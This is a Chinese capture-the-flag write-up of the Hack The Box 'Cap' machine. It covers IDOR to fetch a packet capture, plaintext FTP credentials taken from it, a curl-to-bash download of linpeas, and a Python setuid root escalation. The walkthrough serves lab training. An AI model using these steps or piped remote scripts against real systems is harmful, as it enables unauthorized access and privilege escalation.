Hack The Box-Cap靶机
该靶机通过信息收集拿到大致信息,利用IDOR访问控制缺陷漏洞获得目标流量包,通过流量分析获取到ftp流量包存在用户名密码,可以ftp登录/ssh登录拿到第一个flag,利用linpeas.sh内网收集工具得到python存在UID提权漏洞,查看ctfobins提权,在/root下发现第二个flag
靶机信息
一、信息收集
执行nmap扫描
nmap -sV -sC -O -T4
开启了21,22,80端口
尝试一下ftp匿名连接,失败
访问80页面
查看该面板,有一个下载
下载查看是一个流量包文件,分析一下没有可用信息
查看ipconfig面板,是ip信息
查看网络状态信息
在都没有得到可用信息时,在第二个面板下载的时候发现url存在参数
二、Web渗透
IDOR-访问控制缺陷漏洞
把下载参数修改为0,发现可以访问下载
分析流量包,发现ftp包存在流量信息,拿到用户名密码
记录下来
# user:nathan
# passwd:Buck3tH4TF0RM3!
ftp登录
发现一个user.txt,get下载下来查看,发现第一个flag
这里也可用利用上面的账户密码使用ssh登录,因为在访问web服务时,nothan用户是存在的,即可用利用到ssh
三、提权
查看密码,有bash权限的只有root和nathan,看来还是从该用户入手
因为有了密码,查看可利用命令,无
suid查看一下,没有可以利用的
linpeas.sh-内网自动化信息收集工具
下载地址
https://github.com/peass-ng/PEASS-ng/releases/tag/20250320-91fb36a0
开启web服务,用于上传
靶机使用wget命令下载
赋予权限然后执行
也可以直接从github下载执行
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
最后在此处拿到信息,使用的时候多注意颜色突出的部分,是漏洞利用点
在ctfbbins上搜索提权方法
调用python3执行,成功提权
在根目录的root目录下发现flag
成功完成
四、总结
知识点
- IDOR-访问控制漏洞:
- linpeas.sh: 一款内网linux的自动化信息收集工具,还有windows版本的
- python提权: 二进制漏洞利用UID
python提权命令解析
- python3
执行当前目录下的Python解释器(而非系统默认路径的Python)。 - -c
直接执行后续字符串中的Python代码。 - os.setuid(0)
尝试将进程的有效用户ID(EUID)设为0(即root用户)。 - os.system("/bin/sh")
启动一个shell(若上一步成功,此shell将具有root权限)。
任务1-4
任务5-8
Hack The Box-Cap靶机的更多相关文章
- HACK TEH BOX - Under Construction(JWT密钥混淆 + SQL注入)
HACK TEH BOX - Under Construction(JWT密钥混淆 + SQL注入) 目录 1. JWT密钥混淆 2. 环境 3. Challenge 4. Walkthrough 1 ...
- Hack The Box( Starting Point )
Hack The Box [Starting Point] 初始点 -- 了解渗透测试的基础知识. 这一章节对于一个渗透小白来说,可以快速的成长.以下将提供详细的解题思路,与实操步骤. TIER 0 ...
- Hack the box: Bastion
介绍 目标:10.10.10.134 (Windows) Kali:10.10.16.65 In conclusion, Bastion is not a medium box. But it wou ...
- Bashed -- hack the box
Introduction Target: 10.10.10.68 (OS: Linux) Kali linux: 10.10.16.44 Information Enumeration Firstly ...
- Hack The Box - Archetype
攻略的话在靶场内都有,也有官方的攻略,我作为一个技术小白,只是想把自己的通关过程记录下来,没有网站内大佬们写得好 我们获得了一个IP: 尝试访问了一下,应该不存在web页面: 对常规端口进行一个扫描: ...
- HTB Hack The Box -- Oopsiec
信息收集 开放了22ssh,80端口,其中ssh有弱口令爆破端口 先打开网页,然后进行目录爆破,在这期间先看一下网页的大概信息 没爆到什么有用的东西,但是有uploads文件夹说明是不是说明有文件上传 ...
- Hack The Box 获取邀请码
TL DR; 使用curl请求下面的地址 curl -X POST https://www.hackthebox.eu/api/invite/generate {"success" ...
- Hack The Box Web Pentest 2019
[20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显 ...
- hack the box -- sizzle 渗透过程总结,之前对涉及到域内证书啥的还不怎么了解
把之前的笔记搬运过来 --- 1 开了443,用smbclient建立空连接查看共享 smbclient -N -L \\\\1.1.1.1 Department Shares Operatio ...
- 2019-10-30,Hack The Box 获取邀请码
一.快速获取邀请码方法 1,使用curl请求下面的地址curl -X POST https://www.hackthebox.eu/api/invite/generate 2,在返回结果的code部分 ...
随机推荐
- 基于开源IM即时通讯框架MobileIMSDK:RainbowChat-iOS端v6.0版已发布
关于MobileIMSDK MobileIMSDK 是一套专门为移动端开发的开源IM即时通讯框架,超轻量级.高度提炼,一套API优雅支持UDP .TCP .WebSocket 三种协议,支持iOS.A ...
- Solution -「AGC 039F」Min Product Sum
\(\mathscr{Description}\) Link. 对于所有 \(n\times m\) 的矩阵 \(A\), \(a_{ij}\in[1,k]\cap\mathbb N\), 求 ...
- C# 窗口鼠标穿透以及取消窗口鼠标穿透
private const int WS_EX_TRANSPARENT = 0x20; private const int GWL_EXSTYLE = -20; /// <summary> ...
- C# Winform cilent call SignalR
一.SignalR是什么 Asp.net SignalR是微软为实现实时通信的一个类库.一般情况下,SignalR会使用JavaScript的长轮询(long polling)的方式来实现客户端和服务 ...
- Springboot 整合 xxl-job
前言 很久很久以前写过好几篇关于定时任务的使用系列的文章: 这一篇是最简单的,就是单纯跑跑定时任务,那你看这篇就行,没必要用xxljob(因为xxljob要跑服务端,然后自己服务作为客户端接入): 文 ...
- 第六章 ArrayBlockingQueue源码解析
1.对于ArrayBlockingQueue需要掌握以下几点 创建 入队(添加元素) 出队(删除元素) 2.创建 public ArrayBlockingQueue(int capacity, boo ...
- Java技术栈总结-提升
1 java基础: 1.1 算法 1.1 排序算法:直接插入排序.希尔排序.冒泡排序.快速排序.直接选择排序.堆排序.归并排序.基数排序 1.2 二叉查找树.红黑树.B树.B+树.LSM树(分别有对应 ...
- w3cschool-微信小程序开发文档-API
https://www.w3cschool.cn/weixinapp/weixinapp-network-request.html 微信小程序API 发起请求 发起 HTTPS 网络请求.使用前请注意 ...
- const 用法详解
1. 类的成员函数声明为const类型,在类外定义的时候,也需要添加const 2. 如果常成员函数修改了成员变量,会在编译的时候检查出来错误! 其实关于const用错的报错都是在编译阶段出现的!(大 ...
- MongoDB 常用指令(详细)
# MongoDB 常用指令## 基础命令### 启动与连接```bash# 启动 MongoDB 服务mongod# 连接 MongoDB 客户端mongo```### 数据库操作```bash# ...